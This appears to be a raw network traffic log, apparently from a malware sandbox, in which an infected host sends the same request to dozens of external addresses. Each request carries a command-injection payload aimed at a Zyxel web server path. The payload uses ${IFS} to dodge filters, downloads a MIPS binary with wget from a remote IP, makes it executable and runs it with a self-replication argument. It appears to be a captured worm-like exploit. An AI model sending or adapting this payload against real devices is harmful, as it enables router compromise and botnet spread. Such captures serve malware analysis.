                                            Feb 2, 2024 06:21:33.049156904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9609192.168.2.1553980129.2.38.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049200058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9610192.168.2.154348412.110.69.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049221992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9611192.168.2.15541182.61.240.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049273968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9612192.168.2.1551686104.255.57.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049295902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9613192.168.2.1542828183.32.133.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049339056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9614192.168.2.1555114174.177.102.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049348116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9615192.168.2.1553744178.220.190.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049380064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9616192.168.2.1534614217.118.146.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049403906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9617192.168.2.1550490132.183.126.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049457073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9618192.168.2.1551176151.198.70.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049495935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9619192.168.2.1556476134.31.108.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049519062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9620192.168.2.15561944.59.204.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049554110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9621192.168.2.156073060.84.137.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049585104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9622192.168.2.153496667.39.60.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049638033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9623192.168.2.1534752135.1.160.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049669027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9624192.168.2.15581722.88.96.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049681902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9625192.168.2.1551770129.159.120.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049752951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9626192.168.2.153889836.248.163.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049787998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9627192.168.2.153761819.213.12.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049815893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9628192.168.2.153690874.131.16.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049875975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9629192.168.2.1542516171.219.90.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049912930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9630192.168.2.153895646.217.255.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049942970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9631192.168.2.1549104107.132.167.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.049977064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9632192.168.2.155256642.72.6.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050033092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9633192.168.2.1553708139.173.213.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050081015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9634192.168.2.1546088123.41.178.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050115108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9635192.168.2.1544482195.132.14.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050144911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9636192.168.2.155078661.171.24.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050198078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9637192.168.2.1556276195.218.202.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050235033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9638192.168.2.153850048.82.94.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050270081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9639192.168.2.154642653.80.174.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050308943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9640192.168.2.1539112185.247.36.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050340891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9641192.168.2.154132472.247.204.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050378084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9642192.168.2.1552370162.48.14.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050452948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9643192.168.2.1547484193.39.66.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050487995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9644192.168.2.1540138197.115.73.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050599098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9645192.168.2.1560108122.175.2.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050646067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9646192.168.2.155274080.50.104.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050684929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9647192.168.2.1540130208.99.171.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050733089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9648192.168.2.1551608154.63.10.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050760984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9649192.168.2.1541244115.28.78.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050791979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9650192.168.2.1545992222.89.89.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050849915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9651192.168.2.1557558161.231.144.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050901890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9652192.168.2.155547813.203.138.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050934076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9653192.168.2.1548672206.209.199.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.050965071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9654192.168.2.1533530219.185.194.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051011086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9655192.168.2.155203686.40.170.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051068068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9656192.168.2.155419819.197.151.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051084995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9657192.168.2.1550392218.14.26.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051131964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9658192.168.2.154079841.231.207.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051170111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9659192.168.2.1545820147.207.151.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051181078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9660192.168.2.153948427.72.61.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051215887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9661192.168.2.1540322142.29.78.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051309109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9662192.168.2.1536090154.52.228.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051340103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9663192.168.2.1549536223.26.225.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051414967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9664192.168.2.154520658.113.39.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051441908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9665192.168.2.155429820.3.133.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051486969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9666192.168.2.1545126210.142.208.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051522970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9667192.168.2.1558156150.130.249.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051577091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9668192.168.2.1553816107.129.161.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051604986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9669192.168.2.1542614129.21.239.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051657915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9670192.168.2.1536884168.184.218.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051702976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9671192.168.2.1532838134.253.128.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.051736116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9672192.168.2.153679093.106.241.229443
                                            TimestampBytes transferredDirectionData
